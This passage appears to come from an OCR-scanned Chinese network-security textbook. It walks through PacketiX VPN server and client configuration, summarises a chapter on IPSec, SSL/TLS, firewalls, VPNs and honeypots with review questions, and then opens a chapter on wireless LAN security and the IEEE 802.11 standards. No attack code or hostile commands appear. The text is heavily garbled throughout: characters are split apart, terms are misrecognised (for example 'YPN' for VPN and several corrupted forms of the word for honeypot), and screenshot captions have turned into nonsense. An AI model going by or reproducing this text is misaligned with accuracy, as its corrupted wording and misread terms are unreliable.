他 /可 Mrs 认证 务 总 作 为 用 户 认 
8 因 大 WT 和 虚拟 DHCP 服务 器 


和 UB 上 可 用 。 您 可 以 运行 虚拟 RAT 


Cr | SR 


远程 YPN Server 上 建立 到 HUB 一 
EE 


图 8-35 HUB 管理 界面 


(5) 在 HUB 管理 界面 中 单 击 “ 管 理 用 户 ” 按 钮 ,在 弹出 的 界面 中 单 击 “ 新 建 ”按钮 ,为 
VPN 添加 可 以 登录 的 用 户 ( 用 户 名 和 口令 必须 输入 )。 

(6) 回 到 HUB 管理 主 界面 (图 8-34), 单 击 “ 本 地 网 桥 设置 "按钮 ,在 弹出 的 界面 中 , 选 
择 合适 的 HUB 和 主机 网 络 适配器 ,如 图 8-36 所 示 。 


VLA 透明 设置 工具 (6) | 聘 除 本 地 网 桥 (0) 
新 建新 建 本 地 网 析 定 义 
虚拟 MUB (WD): [nyvey v 


以 太 网 设备 (网络 适配器 ) 
以 太 了 网 【GD=3048120871)] 


着 3 届 多 信任 人 器 建立 桥接 ， 但 在 高 负载 环境 中 ， py 
如 果 无 法 显示 一 个 新 安装 到 系统 的 网 路 适配器 ， 重 启 电脑 ， 并 重新 打开 此 窗口 * 


图 8-36 本 地 网 桥 设 置 界面 
至 此 ,服务 器 端 基本 配置 完成 。 
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2. PacketiX VPN 客户 端 配置 


(1) 在 另外 一 台 主 机 上 安装 下 载 的 PacketiX VPN 客户 端 , 选 择 要 安装 的 组 件 ,如 
图 8-37 所 示 。 


选择 安装 一 个 软件 部 分 


多 PacketiX VPN Client 管理 工具 ( 仅 限 管理 工具 ) 


关于 PacketiX VPN Client 
镜 访 WP nt 电脑 上 。VPN Client 台电 脑 净 能 连接 到 中 心 VPN Server 了 。 管 理 


FE EE 


图 8-37 选择 客户 端 安装 的 组 件 


(2) 接受 许可 协议 .选择 安装 路 径 ,逐步 完成 客户 端 程序 安装 。 启 动 VPN Client 管理 
工具 ,选择 “新 建 虚拟 网 络 适配器 ”选项 ,如 图 8-38 所 示 。 


辆 packetix VPN Client 管理 器 = 各 六 


店 拟 网 阁 适配器 名 状态 MAC 地 址 版 本 
Wm VPN Client Adapter - VPN 已 启用 00-AC-D6-09-14-69 4.19.0.9594 


PacketiX VPN Client 管理 器 大 二 六 辆 packetix VPN Client Build 9652 | 


图 8-38 新建 虚拟 网 络 适配器 
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(3) 虚拟 网 卡 创建 之 后 ,双击 “创建 新 的 VPN 连接 ”, 在 弹出 的 界面 中 输入 服务 器 端 主 
机 地 址 、 客 户 端 要 连接 的 HUB、HUB 认可 的 用 户 名 口令 , 即 可 实现 VPN 连接 ,如 图 8-39 


所 示 。 


新 的 VPN 连接 设置 尾 性 
区 请 为 YPH Server 配置 YPN 连接 设置 


连接 设置 名 m: [新 的 VEN 连接 
目标 YPH Server 凶 ) 
贸 狂 且 sw 上 的 主机 名 或 I 地 址 , 端口 号 


口 禁 用 RAT-T 


~ 


您 可 以 通过 代理 服务 器 连接 到 VPN Server。 


导入 IE 代 理 服务 器 设置 
代理 类 型 TD): 加 直接 TCP/IP 连接 (无 代理 ) @) 
各 通过 HTTP 代理 服务 器 连接 @) 
各 通过 socks 代理 服务 器 连接 G) 


机 汪 轩 丰 


服务 端 证 书 验证 选项 @) 


使 用 虚拟 网 络 适配器 由) 
PVPN Client Adapter - YPN 


用 户 认证 设置 &) 
请 设置 连接 到 VPN Server 时 需要 的 用 户 认证 信息 。 
证 类 型 了 ;标准 密码 验证 
用 户 名 QD: luserl 
密码 QD) fos 
Vi Server EEE 


变更 密码 EE) 


通信 的 高 级 设置 ) 
党 回 昕 开 后 自动 重 注 已) 
刘 : 


口 总 是 验证 服务 端 证 书 C5) 
管理 可 全 发 证 机 关 证 书 列表 C) 


重 连 间隔 四) : 15| 秒 
团 无 限 重 连 (总 是 保持 VPN 在 线 ) GD) 


口 不 要 使 用 TLS 1.0 高 级 设置 中) 


指定 特定 证 书 登录 他 ) 


口 隐 车 和 铺 误 窗口 0) 


图 8-39 VPN 连接 配置 界面 


在 实际 生产 环境 下 ,服务 器 和 客户 机 并 没有 同一 网 段 的 IP 地 址 。 一 旦 VPN 成 功 建 
立 , 各 个 接 人 的 客户 机 如 同 连接 进入 同一 个 局 域 网 一 样 , 可 以 方便 地 共享 资源 。 


本 章 小 结 


(1) IPSec 协议 是 网 络 层 的 安全 协议 ,其 包含 两 个 子 协议 , 即 AH 和 ESP。 两 个 子 协议 
都 能 提供 防 重播 .完整 性 认证 ,来 源 认 证 的 功能 ,ESP 还 提供 对 载荷 数据 加 密 的 功能 。IPSec 
有 两 种 实现 模式 ,传输 模式 和 隧道 模式 ,各 自 适用 于 不 同情 况 。IPSec 在 传输 数据 前 要 先 用 
IKE 协议 建立 包含 安全 通信 参数 的 安全 关联 。 

(2) SSL/TLS 协议 是 传输 层 上 的 安全 协议 。 其 包含 两 个 协议 层 : SSL 记录 协议 层 和 
SSL 握手 协议 层 。 要 使 用 SSL 协议 传输 数据 首先 要 用 SSL 握手 协议 建立 会 话 和 连接 ,会 话 
和 连接 中 有 安全 通信 所 需 的 各 种 参数 ,建立 会 话 时 可 以 验证 彼此 的 X. 509 证 书 。SSL 协议 
提供 机 密 性 、 完 整 性 .数据 来 源 与 身份 认证 等 较为 完善 的 安全 通信 功能 。 

(3) 防火 墙 一 般 放 置 于 网 络 边界 ,通过 过 滤 可 疑 数据 包 的 方式 控制 网 络 流量 ,达到 保护 
网 络 的 目的 。 按 功能 和 协议 层 , 防 火 墙 可 分 为 包 过 滤 防 火 墙 、 状 态 检测 包 过 滤 防 火 墙 .应 用 
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代理 防火 墙 。 防火 墙 设备 是 由 软件 与 硬件 不 同 侧重 的 组 合 实现 的 ,自身 安全 性 和 数据 效率 、 
能 力 各 不 相同 。 要 想 达 到 更 好 的 保护 网 络 的 目的 ,需要 不 同类 型 的 防火 墙 协同 工作 ,组 成 不 
同 的 防火 墙 结 构 。 不 同 的 防火 墙 结 构 有 不 同 的 特点 ,需要 依照 网 络 和 应 用 情况 采用 适宜 的 
结构 来 保护 网 络 。 

(4) VPN 技术 是 在 公共 网 络 上 建立 专用 网 的 技术 。VPN 具有 “专用 网 的 性 能 ,公共 网 
络 的 价格 和 便利 ”, 具 有 极 佳 的 性 价 比 。 以 其 应 用 方式 和 范围 有 接 入 型 .内 联网 、 外 联网 
VPN。VPN 的 关键 技术 有 隧道 技术 、 加 密 技 术 、 密 钥 管 理 技术 、 身 份 认证 技术 、 管 理 技术 。 
VPN 最 基本 的 技术 是 隧道 技术 ,可 以 通过 专线 协议 或 障 道 协议 来 达成 。 各 种 网 络 安全 协议 
能 为 VPN 的 建设 提供 支持 。 

(5) 蜜 缸 主机 是 网 络 安全 设置 的 可 选项 。 其 主要 目的 是 为 了 吸引 攻击 ,可 以 分 散 攻击 
行为 ,并 可 以 记录 攻击 操作 为 如 何 加 强 防 御 提供 信息 。 蜜 铅 主 机 可 以 按 不 同 的 连累 等 级 来 
分 类 ,不 同 连累 等 级 的 蜜 镀 主 机 有 不 同 的 性 能 和 特点 。 欺 骗 网 络 是 多 种 设备 协同 工作 而 形 
成 的 比 密 钠 主机 更 有 效 的 网 络 欺骗 环境 。 


思 考 题 


1. IPSec 协议 的 实现 方式 有 哪 两 种 ?处 理 的 大 致 过 程 是 什么 ? 在 公共 网 络 上 传输 的 数 
据 包 格式 都 是 怎样 的 ? 
. AH 协议 和 ESP 协议 各 自 能 提供 什么 样 的 安全 功能 ? 这些 功 能 是 如 何 实现 的 ? 
.SSL 协议 分 为 哪 两 层 ? 各 层 都 有 什么 协议 ? 它们 都 用 来 做 什么 ? 
.SSL 的 会 话 和 连接 之 间 有 什么 关系 ? SSL 协议 数据 传输 的 大 致 过 程 是 怎样 的 ? 
. 从 工作 的 协议 层 和 工作 方式 划分 ,防火 墙 有 哪 几 种 ? 各 自 查 看 数据 包 的 什么 内 容 ? 
.较为 常见 防火 墙 的 结构 有 哪 几 种 ? 它们 各 自 有 什么 优 缺 点 ? 
. 实现 专线 VPN 可 以 用 哪些 层 的 协议 ? 试 举例 。 它 们 各 自 有 什么 优 缺 点 ? 

8. 从 VPN 的 应 用 方式 和 应 用 范围 来 看 ,VPN 可 以 分 为 几 种 ?它们 各 自 适用 于 什么 样 
的 情况 ? 

9. 专线 VPN 和 隧道 协议 VPN 各 自 有 什么 优 缺 点 ? 

10. 蜜 饶 主 机 是 怎样 的 设备 ? 在 网 络 中 可 以 达成 什么 功能 ? 

11. 蜜 饶 主 机 的 连累 等 级 有 几 种 ? 各 自如 何 界 定 ? 不 同 连累 等 级 的 蜜 饶 主 机 有 什么 优 
缺点 ? 


~] 中 on 上 oo 
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由 于 无 线 网 络 使 用 的 是 开放 性 媒介 采用 公共 电磁 波 作 为 载体 来 传输 数据 信号 ,通信 双 
方 没有 线 缆 连 接 。 如 果 传 输 链 路 未 采取 适当 的 加 密 保 护 ,数据 传 输 的 风险 就 会 大 大 增加 。 
因此 无 线 网 络 安全 日 益 显 得 尤为 重要 。 


9.1 无 线 网 络 安全 概述 及 无 线 网 络 设备 


9.1.1 无 线 网 络 安全 概述 


无 线 局 域 网 (Wireless Local Area Network,WLAN) 是 指 以 无 线 信道 作为 传输 媒介 的 
计算 机 局 域 网 ,是 有 线 联 网 方式 的 重要 补充 和 延伸 ,并 逐渐 成 为 计算 机 网 络 中 一 个 至 关 重 要 
的 组 成 部 分 ,广泛 适用 于 需要 可 移动 数据 处 理 或 无 法 进行 物理 传输 介质 布线 的 领域 。 随 着 
IEEE 802. 11 无 线 网 络 标准 的 制定 与 发 展 , 无 线 网 络 技术 更 加 成 熟 与 完善 ,并 已 成 功 地 广泛 
应 用 于 众多 行业 ,如 金融 证 券 .教育 ,大 型 企业 .工矿 港口 .政府 机 关 酒店 ` 机 场 .军队 等 。 产 
品 主要 包括 无 线 接 人 点 .无 线 网 卡 .无 线路 由 器 .无线 网 关 无 线 网 桥 等 。 

无 线 网 络 的 初步 应 用 ,可 以 追溯 到 第 二 次 世界 大 战 期 间 ,当时 美国 陆军 采用 无 线 电信 号 
做 资料 的 传输 。 他 们 研发 出 了 一 套 无 线 电 传输 科技 ,并 且 采 用 相当 高 强度 的 加 密 技术 ,得 到 
美军 和 盟 军 的 广泛 使 用 。 这 项 技术 让 许多 学 者 得 到 了 一 些 灵感 ,在 1971 年 时 ,夏威夷 大 学 
的 研究 员 创造 了 第 一 个 基于 封包 式 技术 的 无 线 电 通信 网 络 。 这 被 称 为 ALOHNET 的 网 
络 ,可 以 算是 相当 早期 的 无 线 局 域 网 络 (WLAN)。 它 包括 了 7 台 计 算 机 ,它们 采用 双向 星 
型 拓扑 横 跨 四 座 夏 威 夷 的 岛屿 ,中 心计 算 机 放置 在 瓦 胡 岛 上 。 从 这 时 开始 ,无 线 网 络 可 说 是 
正式 诞生 了 。 

虽然 目前 大 多 数 的 网 络 都 仍旧 是 有 线 的 架构 ,但 是 近年 来 无 线 网 络 的 应 用 却 日 渐 增 加 。 
在 学 术 界 、 医 疗 界 、 制 造 业 、 仓 储 业 等 ,无线 网 络 扮演 着 越 来 越 重 要 的 角色 。 特 别 是 当 无 线 网 
络 技术 与 Internet 相 结合 时 ,其 进发 出 的 能 力 是 所 有 人 都 无 法 估计 的 。 其 实 ,我 们 也 不 能 完 
全 认为 自己 从 来 没有 接触 过 无 线 网 络 。 从 概念 上 理解 ,红外 线 传输 也 可 以 认为 是 一 种 无 线 
网 络 技术 ,只 不 过 红外 线 只 能 进行 数据 传输 ,而 不 能 组 网 时 了 。 此 外 ,射频 无 线 鼠 标 `WAP 
手机 上 网 等 都 具有 无 线 网 络 的 特征 。 

截至 2017 年 ,最 为 热门 的 三 大 无 线 技术 是 Wi-Fi、 蓝 牙 及 HomeRF ,它们 的 定位 各 不 相 
同 。Wi-Fi 在 带宽 上 有 着 极为 明显 的 优势 ,达到 11 一 300Mbps, 而 且 有 效 传 输 范 围 很 大 ,其 
为 数 不 多 的 缺陷 就 是 成 本 略 高 及 功 耗 较 大 。 相 对 而 言 , 蓝 牙 技 术 在 带宽 方面 逊色 不 少 ,但 是 
低 成 本 及 低 功 耗 的 特点 还 是 让 它 找 到 了 足够 的 生存 空间 。 另 一 种 无 线 局 域 网 技术 HomeRF， 
是 专门 为 家 庭 用 户 设计 的 。 它 的 优势 在 于 成 本 ,不 过 它 的 业界 支持 度 远 不 及 前 两 者 。 

在 无 线 网 络 环境 下 ,虽然 别人 可 能 是 坐 在 隔壁 的 办 公 室 里 、 楼 上 或 楼 下 ,或 者 旁边 的 一 


第 9 章 无 线 网 络 安全 与 防御 技术 223 


幢 建 筑 物 里 ,但 他 可 以 就 像 是 坐 在 你 的 计算 机 面前 一 样 搞 破坏 。 无 线 网 络 技术 的 发 展 让 我 
们 极 大 地 提高 了 工作 效率 ,并 且 在 使 用 上 越 来 越 简单 ,但 同时 也 给 系统 和 使 用 的 信息 带 来 许 
多 意外 的 危险 。 因 为 ,无 线 就 意味 着 会 让 人 接触 到 数据 。 与 此 同时 ,要 将 无 线 局 域 网 发 射 的 
数据 仅仅 传送 给 一 名 目标 接收 者 是 不 可 能 的 。 而 防火 墙 对 通过 无 线 电波 进行 的 网 络 通信 起 
不 了 作用 ,任何 人 在 视 距 范围 之 内 都 可 以 截获 和 插入 数据 。 

这 就 是 说 ,无 线 网 络 存 在 许多 的 安全 性 问题 ,主要 表现 在 以 下 几 个 方面 。 

(1) 所 有 常规 有 线 网 络 存在 的 安全 威胁 和 隐患 都 存在 。 

(2) 外 部 人 员 可 以 通过 无 线 网 络 绕 过 防火 墙 ,对 公司 网 络 进 行 非 授权 存 取 。 

(3) 无 线 网 络 传输 的 信息 没有 加 密 或 者 加 密 很 弱 , 易 被 窃取 、 算 改 和 插入 。 

(4) 无 线 网 络 易 被 拒绝 服务 攻击 (DoS) 和 干扰 。 

(5) 内 部 员工 可 以 设置 无 线 网 卡 为 P2P 模式 与 外 部 员工 连接 。 

(6) 无 线 网 络 的 安全 产品 相对 较 少 ,技术 相对 比较 新 。 

针对 以 上 问题 ,我们 设 定 了 无 线 网 络 的 安全 目标 ,首先 提供 接 人 控制 ; 然后 确保 连接 的 
保密 与 完好 ; 最 后 防止 拒绝 服务 攻击 (DoS) 。 


9.1.2 无 线 网 络 设备 


在 无 线 局 域 网 里 ,常见 的 设备 有 无 线 网 卡 、. 无 线 网 桥 .无 线 天 线 、.AP 接 人 点 等 。 

1. 无 线 网 卡 

无 线 网 卡 的 作用 类 似 于 以 太 网 中 的 网 卡 , 作 为 无 线 局 域 网 的 接口 ,实现 与 无 线 局 域 网 的 
连接 。 无 线 网 卡 根据 接口 类 型 的 不 同 , 主 要 分 为 3 种 类 型 , 即 PCMCIA 无 线 网 卡 、PCI 无 线 
网 卡 和 USB 无 线 网 卡 。 

(1) PCMCIA 无 线 网 卡 仅 适用 于 笔记 本 电脑 ,支持 热 插 拔 ,可 以 非常 方便 地 实现 移动 无 
线 接 入 。 

(2) PCI 无 线 网 卡 适用 于 普通 的 台式 计算 机 。 其 实 PCI 无 线 网 卡 只 是 在 PCI 转 接 卡 上 
插入 一 块 普通 的 PCMCIA 卡 。 

(3) USB 无 线 网 卡 适用 于 笔记 本 电脑 和 台式 机 ,支持 热 插 拔 ,如 果 网 卡 外 置 有 无 线 天 
线 ,那么 ,USB 接口 就 是 一 个 比较 好 的 选择 。 

2. AP 接 入 点 

AP 是 英文 ACCESS POINT 的 首 字 母 所 写 ,翻译 过 来 就 是 “无 线 访问 点 ?或 “无 线 接 人 
点 ”, 从 名 称 上 看 就 是 通过 它 , 能 把 你 拥有 无 线 网 卡 的 机 器 接 入 到 网 络 中 来 。 它 主要 是 提供 
无 线 工作 站 对 有 线 局 域 网 和 从 有 线 局 域 网 对 无 线 工 作 站 的 访问 ,在 访问 接 入 点 覆盖 范围 内 
的 无 线 工作 站 可 以 通过 它 进行 相互 通信 。 通 俗 地 讲 ,无线 AP 是 无 线 网 和 有 线 网 之 间 沟 通 
的 桥梁 。 由 于 无 线 AP 的 覆盖 范围 是 一 个 向 外 扩散 的 圆 形 区 域 ,因此 ,应 当 尽 量 把 无 线 AP 
放置 在 无 线 网 络 的 中 心 位 置 ,而 且 各 无 线 客户 端 与 无 线 AP 的 直线 距离 最 好 不 要 超过 太 长 ， 
以 避免 因 通信 信号 衰减 过 多 而 导致 通信 和 失败。 

无 线 AP 相当 于 一 个 无 线 集线器 (HUB) 接 在 有 线 交换 机 或 路 由 器 上 ,为 跟 它 连接 的 无 
线 网 卡 从 路 由 器 那里 分 得 IP。 

无 线路 由 器 就 是 AP、 路 由 功能 和 集线器 的 集合 体 ,支持 有 线 、 无 线 组 成 同一 子 网 ,直接 
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接 上 上 层 交 换 机 或 ADSL 猫 等 。 无 线路 由 器 ,从 名 称 上 就 可 以 知道 这 种 设备 具有 路 由 的 功 
能 ,大 家 可 能 对 有 线 的 宽带 路 由 器 有 所 了 解 , 那 么 就 可 以 说 无 线路 由 器 是 单纯 型 AP 与 宽带 
路 由 器 的 一 种 结合 。 它 借助 于 路 由 器 功能 ,可 实现 家 庭 无 线 网 络 中 的 Internet 连接 共享 , 实 
现 ADSL 和 小 区 宽带 的 无 线 共 享 接 人 。 另 外 ,无 线路 由 器 可 以 把 通过 它 进行 无 线 和 有 线 连 
接 的 终端 都 分 配 到 一 个 子 网 ,这 样子 网 内 的 各 种 设备 交换 数据 就 非常 方便 。 

3. 无 线 网 桥 

说 到 无 线 网 桥 ,首先 大 家 要 了 解 网 桥 的 概念 ,网 桥 (Bridge) 又 称 桥接 器 , 它 是 一 种 在 链 
路 层 实现 局 域 网 互 连 的 存储 转发 设备 。 网 桥 有 在 不 同 网 段 之 间 再 生 信号 的 功能 , 它 可 以 有 
效 地 连接 两 个 LAN( 局 域 网 ) ,使 本 地 通信 限制 在 本 网 段 内 ,并 转发 相应 的 信号 至 另 一 网 段 。 
网 桥 通常 用 于 连接 数量 不 多 的 、 同 一 类 型 的 网 段 。 

顾名思义 ,无 线 网 桥 就 是 无 线 网 络 的 桥接 , 它 可 在 两 个 或 多 个 网 络 之 间 搭 起 通信 的 桥梁 
(无 线 网 桥 也 是 无 线 AP 的 一 种 分 支 )。 无 线 网 桥 除了 具备 上 述 有 线 网 桥 的 基本 特点 外 ,还 
比 其 他 有 线 网 络 设备 更 方便 部 署 。 

从 作用 上 来 理解 无 线 网 桥 , 它 可 以 用 于 连接 两 个 或 多 个 独立 的 网 络 段 ,这 些 独立 的 网 络 
段 通常 位 于 不 同 的 建筑 内 ,相距 几 百 米 到 几 十 千 米 。 所 以 说 它 可 以 广泛 应 用 在 不 同 建筑 物 
间 的 互联 。 同 时 ,根据 协议 不 同 ,无 线 网 桥 又 可 以 分 为 2. 4GHz 频段 的 802. 11b 或 802. 11g 
及 采用 5. 8GHz 频段 的 802. 11a 无 线 网 桥 。 无 线 网 桥 有 3 种 工作 方式 , 即 点 对 点 、 点 对 多 点 
和 中 继 连 接 , 特 别 适用 于 城市 中 的 远 距 离 通 信 。 

无 线 网 桥 通常 是 用 于 室外 ,主要 用 于 连接 两 个 网 络 , 使 用 无 线 网 桥 不 可 能 只 使 用 一 个 ， 
必须 两 个 以 上 ,而 AP 可 以 单独 使 用 。 无 线 网 桥 功率 大 ,传输 距离 远 ( 最 大 可 达 50km) , 抗 干 
扰 能 力 强 等 ,不 自 带 天 线 , 一 般配 备 抛物 面 天 线 实现 长 距离 的 点 对 点 连接 。 

由 于 室外 工作 ,因此 一 般 在 天 线 和 无 线 网 桥 主 设备 之 间 , 会 用 一 些小 部 件 来 起 到 防水 、 
防 雷击 的 作用 。 

4. 无 线 天 线 

当 计算 机 与 无 线 AP 或 其 他 计算 机 相距 较 远 时 , 随 着 信号 的 减弱 ,或 者 传输 速率 明显 下 
降 , 或 者 根本 无 法 实现 与 AP 或 其 他 计算 机 之 间 通 信 , 此 时 ,就 必须 借助 于 无 线 天 线 对 所 接 
收 或 发 送 的 信号 进行 增益 (放大 ) 。 

无 线 天 线 有 多 种 类 型 ,不 过 常见 的 有 两 种 : 一 种 是 室内 天 线 , 优 点 是 方便 灵活 ,缺点 是 
增益 小 ,传输 距离 短 ; 另 一 种 是 室外 天 线 。 室 外 天 线 的 类 型 比较 多 ,一 种 是 锅 状 的 定向 天 
线 ; 另 一 种 是 棒状 的 全 向 天 线 。 室 外 天 线 的 优点 是 传输 距离 远 ,因此 适合 远 距离 传输 。 

5. 无 线 终端 设备 

无 线 移动 终端 一 般 是 指 用 户 直接 使 用 并 具有 无 线 网 络 接 入 能 力 的 数字 终端 ,目前 市 面 
上 主要 有 迅驰 笔记 本 电脑 、 带 有 WLAN 无 线 网 卡 的 台式 PC、 具 有 WLAN 接 入 功能 的 手 
机 、PDA 等 ,甚至 现在 还 有 带 WLAN 通信 功能 的 摄像 、 监 控 设 备 。 

其 中 ,基于 CMT( 迅 驰 移动 技术 ) 的 笔记 本 电脑 是 使 用 最 广泛 的 WLAN 终端 ,这 项 技 
术 的 采用 与 WLAN 的 应 用 部 署 几 乎 同步 增长 。 迅 驰 移动 技术 是 国际 知名 芯片 设计 制造 商 
英特尔 专 为 无 线 应 用 而 设计 的 。 采 用 这 种 创新 技术 的 笔记 本 电脑 将 获得 以 下 特性 。 
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(1) 集成 的 无 线 局 域 网 连接 能 力 。 
(2) 突破 性 的 移动 计算 性 能 。 

(3) 延长 的 电池 使 用 时 间 。 

(4) 更 轻 、 更 薄 的 外 形 设计 。 


9.2 无 线 局 域 网 的 标准 


目前 国际 上 有 三 大 标准 家 族 , 它 们 是 美国 IEEE 802. 11 家 族 、 欧 洲 ETSI 高 性 能 局 域 网 
HiperLAN 系列 和 日 本 ARIB 移动 多 媒体 接 入 通信 MMAC。 其 他 类 似 标准 还 有 美国 
HomeRF 共享 无 线 接 人 协议 SWAP。2003 年 5 月 ,两 项 WLAN 中 国标 准 已 正式 颁布 。 这 
两 项 国家 标准 在 采用 IEEE 802. 11/802. 11b 系列 标准 前 提 下 ,在 充分 考虑 和 兼顾 WLAN 
产品 互联 互通 的 基础 上 ,针对 WLAN 的 安全 问题 ,给 出 了 技术 解决 方案 和 规范 要 求 。 这 里 
面 ,IEEE 802. 11 系列 标准 是 WLAN 的 主流 标准 。 


9.2.1 IEEE 的 802. 11 标准 系列 


作为 全 球 公认 的 局 域 网 权威 ,IEEE 802 工作 组 建立 的 标准 在 过 去 20 年 内 的 局 域 网 领 
域内 独 领 风骚 。 这 些 协议 包括 了 802. 3 Ethernet 协议 .802. 5 Token Ring 协议 、802. 3z 
100BASE-T 快速 以 太 网 协议 。 在 1997 年 ,经 过 了 7 年 的 工作 以 后 ,IEEE 发 布 了 802. 11 协 
议 , 这 也 是 在 无 线 局 域 网 领域 内 的 第 一 个 国际 上 被 认可 的 协议 。 在 1999 年 9 月 ,他 们 又 提 
出 了 802. 11b“High Rate” 协 议 , 用 来 对 802. 11 协议 进行 补充 ,802. 11b 在 802. 11 的 1Mbps 
和 2Mbps 速率 下 又 增加 了 5. 5Mbps 和 11Mbps 两 个 新 的 网 络 吞 吐 速率 ,后 来 又 演进 到 
802. 11g 的 54Mbps, 直 至 今日 802. 11n 的 300Mbps 以 上 。 

IEEE 802. 11 标准 是 无 线 网 络 技术 发 展 的 一 个 里 程 碑 IEEE 802. 11(Wireless Fidelity， 
Wi-Fi, 无 线 相 容 认证 ) 标 准 定义 物理 层 和 媒体 访问 控制 (MAC) 规 范 。 物 理 层 定 义 了 数据 传 
输 的 信号 特征 和 调制 ,定义 了 两 个 RF 传输 方法 和 一 个 红外 线 传输 方法 ,RF 传输 标准 是 跳 
频 扩 频 和 直接 序列 扩 频 ,工作 在 2. 4000 一 2.4835GHz 频段 。 

1. IEEE 802. 11a 

规定 WLAN 工作 频段 为 5. 15 一 5. 850GHz, 数 据 传输 速率 达到 54Mbps/108Mbps 
(Super A) 。 该 标准 扩充 了 标准 的 物理 层 , 采 用 正 交 频 分 复 用 OFDM 的 扩 频 技术 。 由 于 工 
作 在 5GHz 频段 ,干扰 比 2. 4GHz 小 很 多 ,稳定 性 较 好 ,但 是 此 标准 与 802. 11b 不 兼容 。 这 
是 其 最 大 的 缺点 ,也 许 会 因此 而 被 802. 11g 淘汰 。 

2. IEEE 802.11b 

规定 WLAN 工作 频段 为 2.4 一 2. 4835GHz。 它 采用 补偿 编码 键 控 调制 方式 ,数据 传输 
速率 可 在 11Mbps、5. 5Mbps、2Mbps、1Mbps 之 间 自 动 切换 。 它 改变 了 了 WLAN 设计 状况 ， 
扩大 了 WLAN 的 应 用 领域 。 最 高 速率 为 11Mbps, 实 际 使 用 速率 根据 距离 和 信号 强度 可 
变 (150 米内 为 1 一 2Mbps,50 米内 可 达到 11Mbps)。 另 外 ,通过 统一 的 认证 机 构 认 证 所 
有 厂商 的 产品 ,802. 11b 设备 之 间 的 兼容 性 得 到 了 保证 。 兼 容 性 促进 了 竞争 和 用 户 接受 
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程度 。 

3. IEEE 802. 11e 

基于 WLAN 的 QoS 协议 ,通过 该 协议 802. 11a、b、g 能 够 进行 VoIP。 也 就 是 说 ， 
802. 11e 是 通过 无 线 数据 网 实现 语音 通话 功能 的 协议 。 该 协议 将 是 无 线 数据 网 与 传统 移动 
通信 网 络 进行 竞争 的 强 有 力 武器 。 

4. IEEE 802. 11g 

标准 工作 的 频段 与 802. 11b 相同 ,拥有 IEEE 802. 11a 相同 的 传输 速率 ,最 高 可 达 
54Mbps/108Mbps(Turbo/Super G) ,安全 性 比 IEEE 802. 11b 好 ,采用 OFDM 调制 方式 ,可 
与 802. 11b 兼容 。 该 标准 已 经 战胜 了 802. 11a, 成 为 下 一 步 无 线 数据 网 的 标准 。 

5. IEEE 802. 11h 

802.11h 是 802. 11a 的 扩展 ,目的 是 兼容 其 他 5GHz 频段 的 标准 ,如 欧盟 使 用 的 
HiperLAN2。 


6. IEEE 802. 11i 

802. 11i 是 新 的 无 线 数据 网 安全 协议 ,已 经 普及 的 WEP 协议 中 的 漏洞 ,将 成 为 无 线 数 
据 网 络 的 一 个 安全 隐患 。802. 11i 提出 了 新 的 TKIP 协议 解决 该 安全 问题 。 

与 其 他 IEEE 802 标准 一 样 ,802. 11 协议 主要 工作 在 ISO 协议 的 最 低 两 层 上 ,也 就 是 物 
理 层 和 数字 链 路 层 。 任 何 局 域 网 的 应 用 程序 .网 络 操作 系统 或 者 像 TCP/IP、Novell 
NetWare 都 能 够 在 802. 11 协议 上 兼容 运行 ,就 像 它们 运行 在 802. 3 Ethernet 上 一 样 。 

802. 11b 的 基本 结构 ,特性 和 服务 都 在 802. 11 标准 中 进行 了 定义 ,802. 11b 协议 主要 
在 物理 层 上 进行 了 一 些 改动 ,加 入 了 高 速 数字 传输 的 特性 和 连接 的 稳定 性 。 

1. IEEE 802. 11 工作 方式 


802. 11 定义 了 两 种 类 型 的 设备 : 一 种 是 无 线 站 ,通常 是 由 一 台 PC 加 上 一 块 无 线 网 络 
接口 卡 构成 的 ; 另 一 种 称 为 无 线 接 人 点 (Access Point,AP) , 它 的 作用 是 提供 无 线 和 有 线 网 
络 之 间 的 桥接 。 一 个 无 线 接 和 人 点 通常 由 一 个 无 线 输出 口 和 一 个 有 线 的 网 络 接口 (802. 3 接 
口 ) 构 成 ,桥接 软件 符合 802. 1d 桥接 协议 。 接 入 点 就 像 是 无 线 网 络 的 一 个 无 线 基站 ,将 多 个 
无 线 的 接 人 站 聚合 到 有 线 的 网 络 上 。 无 线 的 终端 可 以 是 802. 11 PCMCIA 卡 、PCI 接口 、 
ISA 接口 等 ,或 者 是 在 非 计 算 机 终端 上 的 嵌入 式 设备 (如 802. 11 手机 ) 。 

802. 11 定义 了 两 种 模式 : Infrastructure 模式 和 Ad hoc 模式 。 在 Infrastructure 模式 
中 ,如 图 9-1 所 示 ,无 线 网 络 至 少 有 一 个 和 有 线 网 络 连接 的 无 线 接 和 人 点 ,还 包括 一 系列 无 线 
的 终端 站 。 这 种 配置 成 为 一 个 基本 服务 集合 (Basic Service Set,BSS) 。 一 个 扩展 服务 集合 
(Extended Service Set,ESS) 是 由 两 个 或 者 多 个 BSS 构成 的 一 个 单一 子 网 。 由 于 很 多 无 线 
的 使 用 者 需要 访问 有 线 网 络 上 的 设备 或 服务 (文件 服务 器 .打印 机 ` 互 联网 链接 ) ,他 们 都 会 
采用 这 种 Infrastructure 模式 。 

Ad hoc 模式 如 图 9-2 所 示 ,也 称 为 点 对 点 模式 (peer to peer 模式 ) 或 IBSSCIndependent 
Basic Service Set) 模 式 。 
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图 9-1 Infrastructure 模式 图 9-2 Ad hoc 模式 


2. IEEE 802. 11 物理 层 


在 802. 11 最 初 定义 的 3 个 物理 层 包括 了 两 个 扩展 频谱 技术 和 一 个 红外 传播 规范 ,无 线 
传输 的 频道 定义 在 2. 4GHz 的 ISM 波段 内 。 这 个 频段 ,在 各 个 国家 无 线 管理 机 构 中 ,都 是 
非 注册 使 用 频段 。 这 样 ,使 用 802. 11 的 客户 端 设 备 就 不 需要 任何 无 线 许可 。 扩 展 频谱 技术 
保证 了 802. 11 的 设备 在 这 个 频段 上 的 可 用 性 和 可 靠 的 吞吐 量 , 这 项 技术 还 可 以 保证 同 其 他 
使 用 同一 频段 的 设备 不 互相 影响 。802. 11 无 线 标准 定义 的 传输 速率 是 1Mbps 和 2Mbps， 
可 以 使 用 跳 频 序 列 扩 频 技术 (Frequency Hopping Spread Spectrum,FHSS) 和 直接 序列 扩 
频 技 术 (Direct Sequence Spread Spectrum,DSSS)。 需 要 指出 的 是 ,FHSS 和 DSSS 技术 在 
运行 机 制 上 是 完全 不 同 的 ,所 以 采用 这 两 种 技术 的 设备 没有 互 操 作 性 。 

使 用 FHSS 技术 ,2.4GHz 频道 被 划分 为 75 个 1MHz 的 子 频道 ,接收 方 和 发 送 方 协商 
